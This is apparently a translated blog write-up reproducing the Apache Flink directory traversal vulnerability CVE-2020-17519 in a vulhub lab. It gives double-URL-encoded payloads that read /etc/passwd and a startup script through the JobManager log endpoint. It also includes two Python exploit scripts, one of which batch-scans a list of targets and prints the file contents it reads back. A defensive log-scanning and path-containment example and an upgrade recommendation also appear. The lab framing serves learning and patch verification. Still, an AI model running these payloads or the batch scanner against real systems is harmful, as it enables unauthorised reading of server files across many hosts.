About the author
About the author: Hi everyone, I'm _PowerShell, nice to meet you~
Main areas: penetration testing, data communication, communication security, web security, interview analysis
CVE-2020-17519
On January 5, 2021, Apache Flink released a security update fixing two high-severity vulnerabilities discovered and reported by Ant Security FG Lab (蚂蚁安全非攻实验室); one of them is the Apache Flink directory traversal vulnerability (CVE-2020-17519). Flink's core is a streaming dataflow execution engine that provides data distribution, data communication and fault tolerance for distributed computation over data streams. Flink 1.5.1 introduced a REST API, but its implementation has several defects: an attacker can use `../` path traversal through the REST API to read arbitrary files on the system.

Affected versions: Apache Flink 1.5.1 ~ 1.11.2
Environment: vulhub.

```bash
cd vulhub/flink/CVE-2020-17519
docker-compose up -d
docker-compose ps
```

Once the containers are up, open http://ip:8081 in the browser. The environment's notes are in the README:

```bash
cat README.md
```

Remember to shut the environment down when you are done reproducing:

```bash
docker-compose down
```
Read `/etc/passwd`. Raw traversal path:

```bash
../../../../../../../../../../../../etc/passwd
```

URL-encode it twice to get the POC:

```bash
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
```

Online URL encoder: https://www.iamwawa.cn/urldecode.html

Request against the target:

```bash
http://192.168.13.131:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
```
Read `/etc/rc0.d/K01hwclock.sh`. Raw traversal path:

```bash
../../../../../../../../../../../../etc/rc0.d/K01hwclock.sh
```

URL-encode it twice to get the POC:

```bash
/jobmanager/logs/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Frc0.d%252FK01hwclock.sh
```

Online URL encoder: https://www.iamwawa.cn/urldecode.html

Request against the target:

```bash
http://192.168.13.131:8081/jobmanager/logs/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Frc0.d%252FK01hwclock.sh
```

rc0 - rc6 hold the startup scripts for each runlevel.
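To show why the path above is encoded twice and how a defender recognises it, the following is an added example (not the author's scripts and not Flink's own code): it peels off percent-encoding one layer at a time, flags JobManager log requests whose fully decoded name contains a `..` segment, runs that over a few constructed access-log entries, and shows the kind of server-side containment check that keeps the resolved file inside the log directory. The `/tmp/flink-logs` directory and the log entries are assumptions.

```python
import os
from urllib.parse import unquote

LOG_PREFIX = "/jobmanager/logs/"

def decode_layers(raw, max_layers=5):
    """Percent-decode until the string stops changing; return (decoded, layers)."""
    cur, layers = raw, 0
    while layers < max_layers:
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur, layers = nxt, layers + 1
    return cur, layers

def classify_request(request_path):
    """Finding for a log request whose fully decoded name has a '..' segment, else None."""
    if not request_path.startswith(LOG_PREFIX):
        return None
    name = request_path[len(LOG_PREFIX):].split("?", 1)[0]
    decoded, layers = decode_layers(name)
    if ".." in decoded.replace("\\", "/").split("/"):
        return {"layers": layers, "decoded": decoded}
    return None

def resolve_in_log_dir(log_dir, filename):
    """Server-side containment check: refuse any resolved path outside log_dir."""
    base = os.path.realpath(log_dir)
    candidate = os.path.realpath(os.path.join(base, unquote(filename)))
    return candidate if os.path.commonpath([base, candidate]) == base else None

# Constructed access-log entries (method, path, status); not real traffic.
SAMPLE_LOG = [
    ("GET", "/jobmanager/logs/flink-taskexecutor-0.log", 200),
    ("GET", "/jobmanager/logs/..%252f..%252f..%252f..%252fetc%252fpasswd", 200),
    ("GET", "/jobmanager/logs/..%2f..%2fetc%2fpasswd", 404),
    ("GET", "/jobs/overview", 200),
]

def scan_log(entries):
    """Return (path, status, finding) for each entry that classifies as traversal."""
    findings = []
    for _, path, status in entries:
        finding = classify_request(path)
        if finding:
            findings.append((path, status, finding))
    return findings

if __name__ == "__main__":
    for path, status, finding in scan_log(SAMPLE_LOG):
        print(status, finding["layers"], "layer(s):", finding["decoded"], "<-", path)
```

A rule that only decodes once sees `..%2f` rather than `../`, which is exactly why the POC needs the second encoding layer; the containment check also refuses an absolute filename such as `/etc/passwd`.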
https://download.csdn.net/download/qq_51577576/86718693
```python
import argparse
import requests

# Request headers used by the original script (the cookie value is unrelated to Flink)
headers = {
    'cookie': 'UM_distinctid=17333bd886662-037f6fda493dae-4c302372-100200-17333bd8867b; CNZZDATA1278305074=612386535-1594299183-null%7C1594299183; PHPSESSID=drh67vlau4chdn44eadh0m16a0',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0',
}


class Apache_Flink():
    def url(self):
        # Read the target address from the command line and keep it on the instance
        parser = argparse.ArgumentParser(description='Apache Flink(CVE-2020-17519)路径遍历漏洞检测POC')
        parser.add_argument('target_url', type=str, help='The target address,example: http://192.168.140.153:8090')
        args = parser.parse_args()
        self.target_url = args.target_url
        print("Apache Flink(CVE-2020-17519)路径遍历漏洞检测POC!!")
        print("正在执行检测...")
        print("目标地址:", self.target_url)
        return self.target_url

    def check(self):
        # Double URL-encoded traversal path requested through the JobManager log endpoint
        poc = r"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
        url = self.target_url + poc
        try:
            resp = requests.get(url, headers=headers, timeout=4)
            # A 200 that contains a passwd entry means the file was read back
            if resp.status_code == 200 and "root:x" in resp.text:
                print('漏洞存在')
            else:
                print('漏洞不存在')
        except requests.RequestException:
            print('访问异常')


if __name__ == '__main__':
    flink = Apache_Flink()
    flink.url()
    flink.check()
```
### 2. Usage

```bash
python CVE-2020-17519.py http://192.168.13.131:8081
```
https://download.csdn.net/download/qq_51577576/86718662
```python
import requests
import click

banner = '''\033[1;33;40m
_______ ________ ___ ___ ___ ___ __ ______ _____ __ ___
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ |____ | ____/_ |/ _ \
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | / /| |__ | | (_) |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| | / / |___ \ | |\__, |
| |____ \ / | |____ / /_| |_| / /_| |_| | | | / / ___) || | / /
\_____| \/ |______| |____|\___/____|\___/ |_|/_/ |____/ |_| /_/
'''
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}

# Double URL-encoded traversal path requested through the JobManager log endpoint
payload = "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"

# Requests are sent with verify=False; silence the resulting TLS warnings once
requests.packages.urllib3.disable_warnings()


def scan(target):
    """Check a single target and print the returned file when it is vulnerable."""
    poc = str(target) + payload
    try:
        rep = requests.get(url=poc, headers=header, timeout=5, verify=False)
        if rep.status_code == 200 and "root" in rep.text:
            print(u'\033[1;31;40m[+]{} is apache flink directory traversal vulnerability'.format(target))
            print(rep.text)
        else:
            print('\033[1;32;40m[-]{} None'.format(target))
    except requests.RequestException as exc:
        print("error: {}".format(exc))


def scan2(file):
    """Check every target listed one per line in the given file."""
    with open(file, 'r') as f:
        for line in f:
            url = line.strip()
            if not url:
                continue
            poc = url + payload
            try:
                rep = requests.get(url=poc, headers=header, timeout=10, verify=False)
                if rep.status_code == 200 and "root" in rep.text:
                    print(u'\033[1;31;40m[+]{} 存在CVE-2020-17519-Apache-Flink任意文件读取漏洞'.format(url))
                    print(rep.text)
                else:
                    print('\033[1;32;40m[-]{} None'.format(url))
                    print(rep.text)
            except requests.RequestException as exc:
                print("error: {}".format(exc))


@click.command()
@click.option("-u", "--url", help='Target URL; Example:http://ip:port。')
@click.option("-f", "--file", help="Target File; Example:target.txt。")
def main(url, file):
    print(banner)
    if url is not None and file is None:
        scan(url)
    elif file is not None and url is None:
        scan2(file)
    else:
        print("python3 CVE-2020-17519 --help")


if __name__ == "__main__":
    main()
```
- `--help`: show usage help
- `-u`: check whether a single address is vulnerable
- `-f`: batch check a list of targets

```bash
python CVE-2020-17519.py --help
python CVE-2020-17519.py -u http://192.168.13.131:8081
python CVE-2020-17519.py -f target.txt
```
When checking a large number of targets, printing the file that was read directly to the terminal may be inconvenient; you can modify the script yourself. As shown below, a simple modification is to not print the file that was read. Of course you can also write the file content out to a file; either change is easy to make yourself.

```bash
python CVE-2020-17519.py -f target.txt
```
Fix: all users should upgrade to the latest version, download link: https://flink.apache.org/downloads.html
1. Setting up the vulhub range environment with docker: https://blog.csdn.net/qq_51577576/article/details/125048165
2. [vulhub reproduction series] Apache Flink file upload vulnerability (CVE-2020-17518): https://blog.csdn.net/qq_51577576/article/details/126650988
3. Apache Flink directory traversal (CVE-2020-17519) single-target detection script: https://download.csdn.net/download/qq_51577576/86718693
4. Apache Flink directory traversal (CVE-2020-17519) batch detection script: https://download.csdn.net/download/qq_51577576/86718662
5. Online URL encoder: https://www.iamwawa.cn/urldecode.html